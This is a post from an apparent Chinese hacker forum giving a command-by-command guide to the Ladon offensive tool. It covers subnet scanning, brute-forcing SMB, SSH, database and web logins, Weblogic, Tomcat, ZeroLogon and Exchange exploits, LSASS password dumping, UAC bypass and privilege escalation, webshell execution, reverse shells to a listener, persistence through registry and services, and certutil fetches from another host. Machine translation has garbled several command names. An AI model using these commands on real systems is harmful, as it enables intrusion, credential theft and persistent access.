• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Ladon&Cobalt Strike简明教程


k8

Recommended Posts

前言

本文仅是Ladon简单使用示例,Cobalt Strike,PowerShell,KaliLadon跨平台版等用法一致。

完整文档:http : //k8gege.org/Ladon

版本

Ladon7.5 20201010

袜子5代理扫描

例子:扫描目标10.1.2段是否存在MS17010错误(必须加noping)
Ladon noping 10.1.2.8/24 MS17010

详见:http ://k8gege.org/Ladon/proxy.html

网段扫描

CIDR格式:不只是/
24/16/8 (所有)Ladon 192.168.1.8/24扫描模块
Ladon 192.168.1.8/16扫描模块
Ladon 192.168.1.8/8扫描模块

字母格式:仅C段B段A段顺序排序
Ladon 192.168.1.8/c扫描模块
Ladon 192.168.1.8/b扫描模块
Ladon 192.168.1.8/a扫描模块

资产扫描,指纹识别,服务识别,存活主机,端口扫描

001多协议探测存活主机(IP,机器名,MAC地址,制造商)

Ladon 192.168.1.8/24在线PC

002多协议识别操作系统(IP,机器名,操作系统版本,开放服务)

Ladon 192.168.1.8/24 OsScan

003扫描存活主机

Ladon 192.168.1.8/24 OnlineIP

004 ICMP扫描存活主机

Ladon 192.168.1.8/24平

005扫描SMB突破MS17010(IP,机器名,突破编号,操作系统版本)

拉通192.168.1.8/24 MS17010

006 SMBGhost漏洞检测CVE-2020-0796(IP,机器名,突破编号,操作系统版本)

Ladon 192.168.1.8/24 SMBGhost

007扫描Web信息/ Http服务

Ladon 192.168.1.8/24网络扫描

008扫描C段站点URL域名

Ladon 192.168.1.8/24网址扫描

009扫描C段站点URL域名

拉东192.168.1.8/24 SameWeb

010扫描子域名,二级域名

Ladon baidu.com SubDomain

011域名解析IP,主机名解析IP

Ladon baidu.com DomainIP
Ladon baidu.com HostIP

012域内机器信息获取

Ladon AdiDnsDump 192.168.1.8(域IP)

013扫描C段端口,指定端口扫描

Ladon 192.168.1.8/24
PortScan Ladon 192.168.1.8 PortScan 80,445,3389

014扫描C段WEB以及CMS(75种Web指纹识别)

Ladon 192.168.1.8/24 WhatCMS

015扫描思科设备

Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan

016枚举Mssql数据库主机(数据库IP,机器名,SQL版本)

Ladon EnumMssql

017枚举网络共享资源(域,存活IP,共享路径)

Ladon EnumShare

018扫描LDAP服务器

Ladon 192.168.1.8/24 LdapScan

019扫描FTP服务器

拉东192.168.1.8/24 FtpScan

暴力破解/网络认证/弱密码/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH:http : //k8gege.org/Ladon/sshscan.html

020 445端口SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

021 135端口Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

022 389端口LDAP服务器,AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

023 5985端口Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini

024445端口SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

025 135端口Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

026 22端口SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan

027 1433端口Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan

028 1521端口Oracle数据库密码爆破

Ladon 192.168.1.8/24 OracleScan

029 3306端口Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

030 7001端口Weblogic后台密码爆破

Ladon http://192.168.1.8:7001/
控制台WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

031 5900端口VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan

032 21端口Ftp服务器密码爆破

拉东192.168.1.8/24 FtpScan

033 8080端口Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan

034 Web端口401基础认证密码爆破

Ladon http://192.168.1.8/login HttpBasicScan

035 445端口Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

036 445端口IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

进攻检测/进攻利用/ Poc / Exp

037 SMB攻击检测(CVE-2017-0143 / CVE-2017-0144)

拉通192.168.1.8/24 MS17010

038个Weblogic突破检测(CVE-2019-2725 / CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

039 PhpStudy后门检测(phpstudy 2016 / phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc

040 ActiveMQ防御检测(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

041 Tomcat防御检测(CVE-2017-12615)

don 192.168.1.8/24 TomcatPoc

042 Weblogic进攻利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

043 Tomcat防御利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

044 Struts2攻击检测(S2-005 / S2-009 / S2-013 / S2-016 / S2-019 / S2-032 / DevMode)

Ladon 192.168.1.8/24 Struts2Poc

FTP下载,HTTP下载

045 HTTP下载

Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

046 Ftp下载

Ladon FtpDownLoad 127.0.0.1:21 admin管理员test.exe

加密解密(HEX / Base64)

047 Hex加密解密

Ladon 123456 EnHex
Ladon 313233343536 DeHex

048 Base64加密解密

Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64

网络嗅探

049 Ftp密码嗅探

Ladon FtpSniffer 192.168.1.5

050 HTTP密码嗅探

Ladon HTTPSniffer 192.168.1.5

051网络嗅探

Ladon Sniffer

密码读取

052读取IIS站点密码,网站路径

Ladon IISpwd

DumpLsass内存密码

Ladon DumpLsass

信息收集

053进程详细信息

Ladon EnumProcess
Ladon任务列表

054获取命令行参数

Ladon cmdline
Ladon cmdline cmd.exe

055获取渗透基础信息

Ladon GetInfo
Ladon GetInfo2

056 .NET和PowerShell版本

Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion

057运行时版本和编译环境

Ladon Ver
Ladon版本

远程执行(psexec / wmiexec / atexec / sshexec)

445端口PSEXEC远程执行命令(相互作用)

净用户\ 192.168.1.8 k8gege520 / user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt Authority \ system

058 135端口WmiExec远程执行命令(非相互)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

059 445端口AtExec远程执行命令(非相互)

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

060 22端口SshExec远程执行命令(非相互)

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

061 JspShell远程执行命令(非相互作用)

用法:Ladon JspShell类型url pwd cmd
示例:Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

062 WebShell远程执行命令(非参与)

1 
2 
3 
4
用法:Ladon WebShell ScriptType ShellType url pwd cmd
示例:Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
示例:Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
示例:Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

提权降权

063 BypassUac绕过UAC执行,支持Win7-Win10

Ladon BypassUac c:\ 1.exe
Ladon BypassUac c:\ 1.bat

064 GetSystem提权或降权运行程序

Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe资源管理器

065 Runas模拟用户执行命令

Ladon Runas用户传递cmd

其他功能

066 Win2008一键启用.net 3.5

Ladon EnableDotNet

067获取内网站点HTML原始码

Ladon gethtml http://192.168.1.1

068检测后门

Ladon CheckDoor
Ladon AutoRun

069获取本机内网IP与外网IP

Ladon GetIP

070一键迷你WEB服务器

Ladon WebSer 80
Ladon Web 80

反弹壳

071反弹TCP NC外壳

Ladon ReverseTcp 192.168.1.8 4444数控

072反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444外壳

073反弹TCP MSF MET外壳

Ladon ReverseTcp 192.168.1.8 4444米

074反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

075反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

076反弹TCP CMD和PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh

077反弹UDP Cmd和PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp

078 RDP桌面会话劫持(无需密码)

Ladon RDPHijack 3
Ladon RDPHijack 3控制台

079 OXID定位多网卡主机

Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan

080查看用户最近访问文件

Ladon最近

081添加注册表运行启动项

Ladon RegAuto测试c:\ 123.exe

082 AT计划执行程序(无需时间)(系统权限)

Ladon位于c:\ 123.exe,
Ladon位于c:\ 123.exe gui

083 SC服务加启动项&执行程序(系统权限)

Ladon sc c:\ 123.exe
Ladon sc c:\ 123.exe gui
Ladon sc c:\ 123.exe自动ServerName

084 MS16135提权至SYSTEM

Ladon MS16135 Whoami

085 BadPotato服务用户提权至SYSTEM

Ladon BadPotato cmdline

086 SweetPotato服务用户提权至SYSTEM

Ladon SweetPotato cmdline

087 whoami查看当前用户权限以及特权

Ladon whoami

088 Open3389一键开启3389

Ladon Open3389

089 RdpLog查看3389连接记录

Ladon RdpLog

090 QueryAdmin查看管理员用户

Ladon QueryAdmin

091激活内置管理员管理员

Ladon ActiveAdmin

092激活内置用户访客

Ladon ActiveGuest

093查看本机命名管道

Ladon GetPipe

094 139端口Netbios协议Windows密码爆破

Ladon 192.168.1.8/24 NbtScan

095 5985端口Winrm协议Windows密码爆破

Ladon 192.168.1.8/24 WinrmScan

096 WinrmExec远程执行命令无回显(支持系统权限)

Ladon WinrmExec 192.168.1.8 5985 k8gege.org管理员K8gege520 calc.exe

097 getstr / getb64 / debase64(无回显突破回显结果)

监听Ladon web 800

提交返回明文
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64加密结果
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64结果解密
certutil.exe -urlcache -split -f http://192.168.1.110:800/debase64/azhnZWdlNTIw

098 ZeroLogon CVE-2020-1472域控提权(密码置空)

Ladon ZeroLogon dc.k8gege.org

099 CVE-2020-0688 Exchange序列化断裂(.net 4.0)

Ladon cve-2020-0688 192.168.1.142管理员K8gege520

100个自定义程序集插件扫描

Ladon 192.168.1.8/24 IsShiro.exe

工具下载

历史版本:https : //github.com/k8gege/Ladon/releases

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now